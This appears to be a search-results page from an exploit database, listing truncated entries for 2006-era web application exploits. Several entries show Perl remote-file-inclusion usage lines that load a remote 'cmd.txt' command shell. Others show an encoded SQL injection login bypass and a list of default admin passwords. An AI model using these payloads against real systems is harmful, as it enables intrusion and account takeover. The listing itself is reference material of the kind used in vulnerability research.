1145 matches found
[Full-disclosure] Advisory: My Gaming Ladder Combo System <= 7.0 Remote File Inclusion Vulnerability.
--Security Report-- Advisory: My Gaming Ladder Combo System = 7.0 Remote File Inclusion Vulnerability. --- Author: Mustafa Can Bjorn "nukedx a.k.a nuker" IPEKCI --- Date: 22/04/06 13:37 PM --- Contacts: ICQ: 10072 MSN/Email: [email protected] Web: http://www.nukedx.com --- Vendor: MyGamingLadder...
dForum 1.5 - DFORUM_PATH Multiple Remote File Inclusions
dForum 1.5 - DFORUMPATH Multiple Remote File Inclusions dForum ICQ: 10072 MSN/Mail: [email protected] web: www.nukedx.com This exploit works on dForum about.php admin.php anmelden.php closethread.php config.php delpost.php delthread.php dfcode.php download.php editanoc.php forum.php login.php...
CVE-2006-1897
CVE-2006-1897 affects Webplus (aka talentsoft) Web+Shop 5.3.6. The vulnerability arises when the Redirect URL for the “Script Not Found” error is not configured, allowing remote attackers to cause information disclosure via the storeid parameter in store.wml within webplus.exe, revealing the path...
AngelineCMS 0.8.1 (installpath) Remote File Inclusion Exploit
Exploit for unknown platform in category web applications ============================================================= AngelineCMS 0.8.1 installpath Remote File Inclusion Exploit ============================================================= !/usr/bin/perl AngelineCMS 0.8.1 installpath Remote Cod...
AngelineCMS 0.8.1 - installpath Remote File Inclusion
AngelineCMS 0.8.1 - installpath Remote File Inclusion !/usr/bin/perl AngelineCMS 0.8.1 installpath Remote Code Execution Exploit Bug Found & code By K-159 code reference from uid0/zod at ExploiterCode.com echo.or.id c 2006 usage: perl angelineCMS.pl perl angelineCMS.pl http://target.com/...
squery.pl.txt
!/usr/bin/perl SQuery perl squery.pl http://site.com/SQuery/ http://site.com/cmd.txt cmd cmd shell example: cmd shell variable: $GETcmd; hai to: nex, kutmaster, spic, cijfer ;P, ReZeN, wr0ck, blackhat-alliance.org, and everyone else! special shout to illwill! Contact: www.exploitercode.com...
INDEXU 5.0.1 - base_path Remote File Inclusion
INDEXU 5.0.1 - basepath Remote File Inclusion !/usr/bin/perl INDEXU perl indexu.pl http://target.com/indexu/ http://target.com/cmd.txt cmd cmd shell example: cmd shell variable: $GETcmd;...
INDEXU <= 5.0.1 (base_path) Remote File Inclusion Exploit
Exploit for unknown platform in category web applications ========================================================= INDEXU perl indexu.pl http://target.com/indexu/ http://target.com/cmd.txt cmd cmd shell example: cmd shell variable: $GETcmd;...
VWar-1.5.0.pl.txt
!/usr/bin/perl VWar perl vwar.pl http://site.com/VWar/ http://site.com/cmd.txt cmd cmd shell example: cmd shell variable: $GETcmd; hai to: nex, kutmaster, spic, cijfer ;P, ReZeN, wr0ck, blackhat-alliance.org, and everyone else! special shout to illwill! Contact: www.exploitercode.com...
VWar 1.5.0 R12 Remote File Inclusion Exploit
Exploit for unknown platform in category web applications ============================================ VWar 1.5.0 R12 Remote File Inclusion Exploit ============================================ !/usr/bin/perl VWar perl vwar.pl http://site.com/VWar/ http://site.com/cmd.txt cmd cmd shell example: cm...
SQuery 4.5 - libpath Remote File Inclusion
SQuery 4.5 - libpath Remote File Inclusion !/usr/bin/perl SQuery perl squery.pl http://site.com/SQuery/ http://site.com/cmd.txt cmd cmd shell example: cmd shell variable: $GETcmd; hai to: nex, kutmaster, spic, cijfer ;P, ReZeN, wr0ck, blackhat-alliance.org, and everyone else! special shout to...
PHPNuke-Clan 3.0.1 (vwar_root2) Remote File Inclusion Exploit
Exploit for unknown platform in category web applications ============================================================= PHPNuke-Clan 3.0.1 vwarroot2 Remote File Inclusion Exploit ============================================================= !/usr/bin/perl PHPNuke-Clan 3.0.1 Remote File Inclusion...
KnowledgebasePublisher 1.2 (include) Remote Code Execution Exploit
No description provided by source. !/usr/bin/perl KnowledgebasePublisher 1.2 Remote Code Execution Exploit Bug Found By uid0 c 2006 ExploiterCode.com usage: perl knowledgebase.pl location of KnowledgebasePublisher cmd shell location cmd shell variable perl knowledgebase.pl...
KnowledgebasePublisher 1.2 - 'Include' Remote Code Execution
!/usr/bin/perl KnowledgebasePublisher 1.2 Remote Code Execution Exploit Bug Found By uid0 c 2006 ExploiterCode.com usage: perl knowledgebase.pl perl knowledgebase.pl http://site.com/knowledgebase/ http://site.com/cmd.txt cmd cmd shell example: cmd shell variable: $GETcmd; hai to: nex, kutmaster,...
ASPThai.Net Guestbook <= 5.5 (Auth Bypass) SQL Injection Exploit
No description provided by source. !/usr/bin/perl SQL Injection Exploit for ASPThai.Net Guestbook = 5.5 And possible higher could not find a site to test it on This exploit shows the username of the administrator and the password In plain text Bug Found by muderskillz Coded by Zodiac Shouts to...
ASPThai.Net Guestbook <= 5.5 (Auth Bypass) SQL Injection Exploit
Exploit for unknown platform in category web applications ================================================================ ASPThai.Net Guestbook new or die; $cookiejar = HTTP::Cookies-new; $xpl-agent'g00ns'; $xpl-cookiejar$cookiejar; $res = $xpl-post $Server.'checkuser.asp', Content = 'txtUserNam...
ASPThai.Net Guestbook 5.5 - Authentication Bypass
!/usr/bin/perl SQL Injection Exploit for ASPThai.Net Guestbook new or die; $cookiejar = HTTP::Cookies-new; $xpl-agent'g00ns'; $xpl-cookiejar$cookiejar; $res = $xpl-post $Server.'checkuser.asp', Content = 'txtUserName' = '' or '%67%30%30%6e%73'='%67%30%30%6e%73', 'txtUserPass' = '' or...
dbmanDefault.txt
Tunis the 31/jan/2006 bug found by Fireboy [email protected] Product affected:DBMan for Windows and Unix Product vendor: http://www.gossamer-threads.com the problem with DBman is default passwords these are default pass : admin/admin,author/author,guest/guest if the admin not change the pas...
[KAPDA::#18] - WebWiz Products SQL Injection
KAPDA::18 - WebWiz Products SQL Injection Happy new year ! : KAPDA New advisory Vulnerable products : webwiz site news access2000 : vesion 3.06 and prior versions webwiz journal access2000 : version 1.0 webwiz weekly poll access2000 : version 3.06 and prior versions database login access2000 :...
Battle Carry <= .005 Socket Termination Denial of Service Exploit
Exploit for unknown platform in category dos / poc ================================================================= Battle Carry include include include ifdef WIN32 include / Header file used for manage errors in Windows It support socket and errno too this header replace the previous sockerrX.h...